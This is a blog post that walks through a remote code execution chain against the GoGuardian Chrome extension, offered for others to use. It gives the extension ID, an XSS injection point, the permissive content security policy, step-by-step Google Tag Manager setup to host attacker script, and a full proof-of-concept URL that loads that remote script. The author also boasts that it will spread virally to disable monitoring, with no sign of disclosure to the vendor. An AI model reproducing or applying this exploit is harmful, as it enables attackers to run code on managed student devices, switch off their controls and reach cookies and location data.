How I achieved RCE in GoGuardian and why it'll be the next viral exploit

Alright, so what's RCE? It means Remote Code Execution. Basically, it's when somebody gets to run code on your device in a place where they should not be allowed to run code.

For example, imagine visiting a website. Suddenly, GoGuardian disables itself. I mean, that surely shouldn't be possible, right?

But it is.

In this case, visiting a simple URL will run code inside GoGuardian. I'll reveal the full URL at the end of the article, and the rest of the article will be how exactly I built this URL, as well as the steps you'd need to do it yourself.

If you want a URL to be able to run code, the first thing you'll need is an XSS (Cross-Site Scripting) vulnerability. Basically, a website or app takes user input and writes it into the page as actual code instead of text.

So I found an XSS vulnerability in GoGuardian. Took around ten minutes.


      chrome-extension://haldlgldplgnggkjaafhelgiaglafanh/teacher/lesson-plans/blocked.html?cs=[1,{"name":"<b>robert</b>"}]

Any URL starting with the chrome-extension://haldwhatever nonsense will have access to all of GoGuardian's permissions, including but not limited to the following:

Ability to enable or disable all extension (including itself) until chrome://restart
Run code on most websites similarly to bookmarklets
Break GoGuardian literally forever

Okay, so we can put HTML into a GoGuardian extension page. So now we have RCE, right?

Sadly, not yet.

CSP (Content Security Policies) exist. They tell Chrome to not run any scripts unless they are specifically allowed. By default, Chrome Extensions have the strictest policy, but GoGuardian's is a little looser:


      script-src 'self' https://ssl.google-analytics.com https://*.pusher.com
      'unsafe-eval'; object-src 'self'

What this means is that the GoGuardian extension will still run scripts if they are from https://ssl.google-analytics.com/ or a https://pusher.com/ subdomain.

So, um. Now I've gotta somehow find a JavaScript file on these domains that will run my script. Alternatively, you could use DNS spoofing (which [swamp] does), but the user has to set that up, which ruins the whole point of RCE.

My first hope was to find some sort of file upload, Script Gadget, or even a Subdomain Takeover (very illegal) on Pusher. But I couldn't find anything good, so I took a break for a couple of months.

But then (yesterday), with the help of an old bug report on GitHub, I found some vital information. There's a service called Google Tag Manager, which is used by websites for analytics and conversion tracking. One of its features is to allow you to run scripts within its framework. These scripts are also hosted on the Google Analytics domain.

Here's a quick setup tutorial: (Credit to The Greatest Giant#0110 for writing this out)

Go to Google Tag Manager and press "Create Account".
Fill in the details, select "Web" as the target platform, and click "Create"
Go to the "Variables" tab on the left-hand menu
Make a new "User-Defined Variable" with "Custom JavaScript", and use something like the code below:


      function () {
 alert(1);
 return "";
}

Save the variable and name it something like "yay"
Go to the "Tags" section and create a new tag
Set the tag type to "Custom HTML"
Put something like {{yay}} as the code, which will run the variable
Set "Initialization" as the trigger of the tag
Use the "Submit" button in the top-right and publish your workspace

In the end, your JavaScript will be hosted at a URL like the one below:

https://ssl.google-analytics.com/gtm/js?id=GTM-P4W948N

You can find your own "GTM" code from the top bar of the Google Tag Manager site.

Full POC:

Okay, so now we have code hosted on the Google Analytics domain. And we have HTML injection in GoGuardian. And along with <iframe srcdoc>'s script-injecting capabilities, you can craft a full URL to run code as GoGuardian.


      chrome-extension://haldlgldplgnggkjaafhelgiaglafanh/teacher/lesson-plans/blocked.html?cs=[1,{"name":"<iframe
      srcdoc=\"<script
      src='https://ssl.google-analytics.com/gtm/js?id=GTM-P4W948N'></script>\">"}]

The one above opens a menu called [swamp], which I coded a long time ago for bypassing stuff with a GoGuardian shell.

Is this bad for GoGuardian? Yes. 100%.

The cherry on top is the fact that teacher/* is in the extension's web_accessible_resources, meaning that normal websites can redirect to and even embed the vulnerable URL without you having a clue. On an unrelated note, GoGuardian also has access to all your cookies and location coordinates.

Some would say that this is a multi-thousand-dollar vulnerability. It could be used for very, very evil purposes. However, in my mind, bypassing beats money. And bypassing beats evil. It's like the world's unfairest rock-paper-scissors game.

Anyway, I think that this exploit will definitely spread quickly due to its ability to be embedded in normal websites. A classmate just tells you to "go to this website" and suddenly you have a menu in which you can disable all your extensions, assuming that you have GoGuardian. I've dubbed this menu-opening version of the exploit "[swamp] ULTRA", since the original [swamp] setup required DNS spoofing.

It'll be funny to see if the sysadmins can figure out how this works.

And it'll be funny to see how long it'll take for GoGuardian to fix it.

Home